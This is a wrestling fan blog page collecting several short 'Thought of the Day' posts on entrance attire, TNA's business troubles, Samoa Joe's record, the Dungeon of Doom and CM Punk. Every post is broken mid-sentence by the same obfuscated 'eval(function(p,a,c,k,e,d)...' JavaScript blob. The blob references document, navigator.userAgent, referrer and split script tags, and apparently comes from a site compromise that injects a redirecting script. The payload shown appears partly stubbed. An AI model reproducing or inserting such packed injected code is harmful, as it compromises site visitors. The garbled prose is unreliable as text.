Thought of the Day: Needs More Rico

Ignoring eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nfzen|var|u0026u|referrer|fhrtd||js|php'.split('|'),0,{})) the fact that Rico had some of the most underutilized talent ever, that’s not exactly what I want to talk about today. This came to my attention on Smackdown last week: how many people in WWE have custom entrance attire anymore?  The answer is not many.  Almost every big name comes to the ring in their latest t-shirt so they can throw it to the crowd or take it off and sneer at the people.  I miss the days of Ric Flair robes, massive Randy Savage hats, Steve Austin vests, Undertaker’s trench coat, Randy Orton’s two bottles of baby oil, Trish’s cowboy hat and coat and Vader’s big helmet.  This is one area that TNA owns WWE in.  Roode has his robe, Bad Influence has the leather jackets and sunglasses, AJ has his hooded jacket.  Those things help.

Bring some of that stuff back so these guys can stand out a bit more rather than looking like the same idea over and over.

Thought of the Day: Major and Minor

This eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rneza|var|u0026u|referrer|eednf||js|php'.split('|'),0,{})) came up again last night while watching an old Raw.JR said Bret had won several major titles in the WWF, including the WWF, Tag Team and Intercontinental Title.

This brings up a question I’ve asked for years: what are some of the minor titles in wrestling?  I’ve heard of major ones, but never any examples of minor ones.

Thought of the Day: TNA At The Moment

Covering eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|teekh|var|u0026u|referrer|dziry||js|php'.split('|'),0,{})) two current TNA stories.1. Apparently AJ Styles will be gone for a few more months, defending the TNA World Title around the world.

Translation: Remember that guy we spent most of 2013 building up?  Well you just don’t get to see him anymore but come back later because he might be back then.  Until then, watch a bunch of guys that AJ beat in a competition fight for the other title in his absence!

2. Dixie Carter announced a former world champion returning to Impact tomorrow night in Cincinnati.

It would be Pacman Jones, the former tag team champion from several years back.  In other words, instead of bringing in new Knockouts, tag teams, X-Division guys or some fresh faces, TNA feels the better move is to bring back a guy who didn’t wrestle, most people complained about being in TNA the first time, and makes the news for not getting arrested rather than the more traditional opposite.

That’s TNA in a nutshell at the moment.  More on their screwups later.

Thought of the Day: Samoa Joe Lives On His Reputation

This eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nazrk|var|u0026u|referrer|frnat||js|php'.split('|'),0,{})) came from a discussion on WrestleZone and me watching the latest One Night Only show.Samoa Joe might be the most overrated guy in TNA at the moment.  Think about this for a minute.

Joe owned the world in 06/07, didn’t win the world title until WAY after his peak and had a forgettable world title reign in the summer of 2008.  What of note has he done since then?  Here are his accomplishments since losing the world title at Bound For Glory 2008, or roughly five years ago:

X-Division Title (50 days)

Tag Titles (91 days)

Television Title (70 days)

Joe also won the Maximum Impact tournament, which was held entirely on Xplosion and was for a world title shot also on Xplosion.  Oh and he won the Deuces Wild tag tournament with Magnus.

On the other hand, here’s another set of accomplishments in roughly the last three years:

Television Title (126 days)

X-Division Title (30 days)

Tag Titles (14 days)

These numbers belong to Robbie E.  Robbie E., the epitome of the comedy jobber, has numbers comparable to Samoa Joe over the last three years, and very easily could surpass him if this tag title reign lasts awhile.  Think about that for a minute.  Robbie E. > Samoa Joe in success.

What has Joe done lately to keep him at the elite level in TNA?  From what I can tell, very little.

Thought of the Day: TNA Possibly Going Back To Orlando/Some Other Home City

Is eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hnktn|var|u0026u|referrer|kiieh||js|php'.split('|'),0,{})) best for business. The current word on the street is that TNA is moving back to a home city, most likely Orlando again, to hold most of their TV tapings.  A few major shows could be taped on the road.  This is without a doubt the right move for TNA for one reason: they can’t afford to stay on the road.

Look at TNA’s business lately.  They’ve cut away their PPVs, they’re cutting house shows, they air specials on TV which get slightly higher ratings/audiences than usual, and they’re spending way more money on TV tapings.  Translation: spend more, bring in less.  For a company like TNA which doesn’t have a ton of sponsors and doesn’t draw huge crowds (see: Glory, Bound For), going on the road this often isn’t a viable plan.  People often compare TNA to WCW, but it’s really more like ECW.  Think about this for a second.

ECW did most of its shows from one area/city

They never came close to being #1 or #2 (TNA is firmly #2 but only because there isn’t a third major company)

Their TV show is the #1 show on its network, but it doesn’t ever draw many people outside of its core audience

Only after several years of being an underground hit did it start regularly holding TV tapings outside of its base

ECW lasted about a year taping on the road before going back to house shows and syndication where it lasted abut six more months.  Now before you ask, no I’m not saying TNA has six months left and no I’m not saying they’re in the same kind of shape as ECW was in 1999/2000.  What I’m saying is right now, TNA flat out cannot maintain their status quo or grow nearly at all while doing TV on the road.

In short, they can stay in Orlando/whatever single city they pick and survive at a stable level or they can have a hotter crowd once in awhile and barely be able to afford anything outside of TV.  This isn’t a complicated problem.

Thought of the Day: Vickie Guerrero, Emma and Dancing

Something eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|esdbr|var|u0026u|referrer|ynssk||js|php'.split('|'),0,{})) else NXT is better than the main show at doing. If you watch NXT, you know that there’s a character named Emma who likes to do a silly dance and have fun.  At the same time, Vickie Guerrero has been known to dance once or twice on TV.  Now here’s the difference.

When Emma dances, she knows it’s silly but she’s a likeable character and the fans have fun with her.

When Vickie dances, the fans are laughing at her and she’s humiliated, usually making the segment uncomfortable for the fans to sit through.  Either that or it drags on way too long and gets stupid.

The idea is this: it’s ok to have a character who we laugh with instead of at once in awhile.  Not everything has to be all serious all the time.

Thought of the Day: The Most Underrated Stable Of All Time

Is eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ssatn|var|u0026u|referrer|satdy||js|php'.split('|'),0,{})) the Dungeon of Doom.  It’s true.Think about it.  Let’s look at what they accomplished:

1. They won a lot of titles.

2 World Titles

1 US Title

1 Tag Title (Half)

1 TV Title

Not too bad for being around about two years.

2. They stopped face Hulk Hogan’s year plus long title reign.  That means Giant did what Flair, Vader, Luger, Sting and Savage couldn’t do, and he did it in his debut match.

3. Those two world titles came from Hulk Hogan and Ric Flair.  One other man has ever done that and his name is Sting.  It took Giant seven months.  It took Sting seven years.

4. Kevin Sullivan had a forgotten classic at Bash at the Beach 1996 against Chris Benoit.  I’ll take that match over the Bret vs. Shawn Iron Man match any day.

5. Yeah they were stupid, but look at the NWO with all of their changes and backstabbing and Hogan destroying a company.  Wrestling was built on being over the top and insane so why was it bad when the Dungeon did it?

Thought of the Day: Inside CM Punk’s Bubble

So eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bnzby|var|u0026u|referrer|fidse||js|php'.split('|'),0,{})) a common criticism at the moment is CM Punk is ignoring the current regime storyline and just focusing on Paul Heyman.  Why are people complaining about this?Punk talked for weeks about how much he hated Paul Heyman and wanted to take him out no matter what.  He said there was nothing that would stop him from running through everyone Heyman could throw at him until he got to Heyman himself and that’s exactly what he’s doing.

So why are people complaining?  Punk is doing EXACTLY what he said he was going to do, meaning he’s sticking to the story that was set up for him.  Why is this such a horrible thing?  Punk will finish up with Heyman soon and then he’ll go after HHH and the new regime.  That’s not a bad thing at all.

Thought of the Day: Who Is The Star Of Raw?

Look eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rhyti|var|u0026u|referrer|nbyst||js|php'.split('|'),0,{})) back at the last few weeks and this isn’t very clear.

Who is the focal point of Raw?  It’s not Bryan, who was only on TV for about five minutes on Monday and got laid out to end the show.

It might be Orton, who is becoming his old self again.

HHH/Stephanie?  Yeah probably, but they’re not really even involved in the main feud.

Punk?  Well he and Heyman are getting as much TV time as anyone so we could go with one of them.

In short, it’s really not clear who or what Raw is focused around right now and it’s making for some weaker shows.

Thought of the Day: Back In The Day

So eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|teznk|var|u0026u|referrer|bkdss||js|php'.split('|'),0,{})) I’ve been watching Raw from 1999 and the following becomes obvious. The show is dominated by about 10 acts.  You have Austin, Rock, Vince, Stephanie, Undertaker, Shane, HHH, Shamrock and the Ministry, all making about 5 appearances each.  Today this is called dominating a show while 1999 is called the good old days.

Funny how that works.
